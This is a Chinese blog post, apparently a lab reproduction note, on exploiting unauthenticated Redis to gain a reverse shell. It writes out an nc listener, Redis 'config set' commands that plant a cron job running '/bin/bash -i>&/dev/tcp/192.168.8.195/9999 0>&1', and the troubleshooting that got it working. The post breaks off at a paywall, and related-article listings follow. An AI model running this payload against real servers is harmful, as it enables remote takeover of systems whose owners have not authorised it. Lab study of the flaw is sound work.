《Redis未授权访问getshell》复现笔记(二)

最新推荐文章于 2025-09-21 22:26:40 发布
原创 最新推荐文章于 2025-09-21 22:26:40 发布 · 598 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细记录了复现Redis未授权访问并利用crontab反弹shell的过程,包括环境介绍、复现步骤、遇到的问题及解决办法。在尝试写入命令和定时任务后,通过排查错误,最终成功反弹shell。

《Redis未授权访问getshell》复现笔记(二)

复现完了写马getshell,我们再来复现一下利用crontab反弹shell:
使用nc.exe在攻击机上监听9999端口:

nc –lvvp 9999

在这里插入图片描述
还是使用Redis Clinet写入如下命令

config set dir /var/spool/cron
config set dbfilename root
set xxx "\n\n\n* * * * * /bin/bash -i>&/dev/tcp/192.168.8.195/9999 0>&1\n\n\n"
save

在这里插入图片描述
等待一分钟……(10分钟过去了)
emmm……
不要慌,一步一步的排查问题:

service crond status  #确认服务器是否开启定时任务计划服务
cat /var/spool/cron/root  #查看我们输入的代码是否插入到定时任务文件
tail -f /var/log/cron  #查看crontab的日志

在这里插入图片描述
通过查看日志,我们发现报错信息:bad minute(错误的时间),难道是因为执行语句前后的乱码导致cron无法正常读取文件中的命令?
我们vim /var/spool/cron/root手动修改root文件试试看,
在这里插入图片描述
等待一分钟,成功反弹shell!
在这里插入图片描述
问题的原因找

最低0.47元/天 解锁文章
十八种未授权访问漏洞合集(暂时最全)
墨痕诉清风的博客
01-04 5736
目录 0x01 未授权漏洞预览 0x02 Active MQ 未授权访问 0x03 Atlassian Crowd 未授权访问 0x04 CouchDB 未授权访问 0x05 Docker 未授权访问 0x06 Dubbo 未授权访问 0x07 Druid 未授权访问 0x08 Elasticsearch 未授权访问 0x09 FTP 未授权访问 0x10 HadoopYARN 未授权访问 0x11 JBoss 未授权访问 0x12 Jenkins 未授权访问 0x13 Jupyt
第55天:服务攻防-数据库安全&Redis&Hadoop&Mysql&未授权访问&RCE
weixin_52529261的博客
01-27 1000
服务攻防-数据库安全&Redis&Hadoop&Mysql&未授权访问&RCE
Redis未授权访问getshell复现笔记(一)
limb0的博客
09-12 851
Redis未授权访问getshell复现笔记(一) 利用周末复现了一下Redis未授权访问getshell,期间遇到了一些坑,虽然结果没什么悬念,却花费了不少时间,故将过程详细记录,留给有需要的人。此贴仅供新手参考,大佬勿喷。 一、 环境介绍 靶机:CentOS 6.5 (点击下载) IP:192.168.17.140 攻击机:Win10(本机) IP:192.168.8.195 、...
Redis未授权访问漏洞复现
Armandhe的博客
06-01 1343
redis未授权访问漏洞的复现、利用条件、防御措施、
Redis未授权访问以及getshell的几种方式
最新发布
you_possible的博客
09-21 1909
Redis数据库未授权访问以及getshell的几种方式。
redis未授权getshell四种方式
没有
04-24 7014
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
Redis未授权访问导致getshell
isxiaole的博客
11-09 3507
redis未授权访问导致getshell redis未授权访问漏洞利用
redis 未授权访问getshell
Guoke324的博客
04-06 904
目录 redis未授权访问 redis getshell方法 webshell 文件 利用 SSH key进行 getshell 通过corntab的方式进行getshell redis未授权访问 Redis在默认情况下,会绑定在0.0.0.0:6379,如果没有采用限制IP访问,就会将Redis服务暴露在公网上,并且在没有设置密码认证的情况下,会导致任意用户未授权访问Redis以及读取Redis数据并入公钥进行远程连接等。 利用python去检测,或者...
未授权访问漏洞上(漏洞复现合集)
2301_76631050的博客
08-04 1921
Redis 默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis 以及读取 Redis 的数据。默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。
Redis未授权访问漏洞导致getshell
2401_82451607的博客
02-14 483
Redis未授权访问漏洞导致getshell
redis 未授权访问拿shell
blackguest07的博客
03-18 1175
redis未授权访问拿shell
Redis 未授权访问与Get Shell漏洞
K1ose的博客
11-20 1178
Redis 未授权访问与Get Shell漏洞 漏洞原理与危害 Redis默认情况下,会绑定在默认端口,如果没有采用相关策略,例如 ​ ①防火墙拦截非信任IP ​ ②端口屏蔽 会将Redis服务器暴露在公网上,如果没有设置口令认证,会导致任意用户在访问目标服务器时能够未经授权便访问Redis以及其数据。利用Redis自身提供的config命令进行文件操作,可以将自己的SSH公钥入目标服务器的/root/.ssh文件夹的authotrized_keys文件中,进而可以使用对应私钥直接使用ssh服务登陆目标
Redis 未授权访问漏洞与getshell(附getshell检测工具)
告白的博客
02-24 4495
Redis 简介. Redis 是完全开源免费的,遵守 BSD 协议,是一个灵活的高性能 key-value 数据结构存储,常见用来作为数据库,其在安全配置问题上存在一些问题,如常见的未授权范围与Pickle反序列化
redis未授权访问getshell的方式
居上
06-28 2168
redis简介 Redis是一个开源的使用ANSI C语言编、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库 端口:6379 环境 kali =>192.168.60.134 cenos => 192.168.60.130 redis未授权访问 Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,如配置防火墙规则避免其他非信任来源的IP访问,就会将Redis服务暴露在公网上 ./redis-server 使用默认配置 ./red
Linux下Redis未授权访问getshell三种方法 (1、秘钥登录)
daxi0ng的博客
11-26 2531
介绍: REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo的key-value存储系统。 Redis是一个开源的使用ANSI C语言编、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 它通常被称为数据结构服务器,因为值(value)可以是 字符串(String), 哈希(H...
redis未授权漏洞三大getshell姿势
weixin_67289581的博客
10-17 1905
Redis未授权漏洞是指在默认配置下,Redis服务器会绑定在0.0.0.0:6379端口,如果没有设置密码认证(通常为空),并且没有采取相关的安全策略,如添加防火墙规则来限制访问,那么Redis服务可能会暴露在公网上,导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。
redis未授权访问getshell
weixin_30567471的博客
12-12 199
redis未授权访问的问题一年前就爆了,当时刚开始学安全,还不太懂。今天借着工作的机会来搞一把,看看能不能拿下一台服务器。其实前几天就好了一直想找个实际环境复现一下,一直没有找到,只说下大致思路。 首先redis未授权的漏洞有几个先决条件,自己搭建漏洞环境的话需要在配置文件redis.conf中修改 1、允许其他网段连接 2、关闭protected-mode 漏洞的发现可以批量跑POC,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值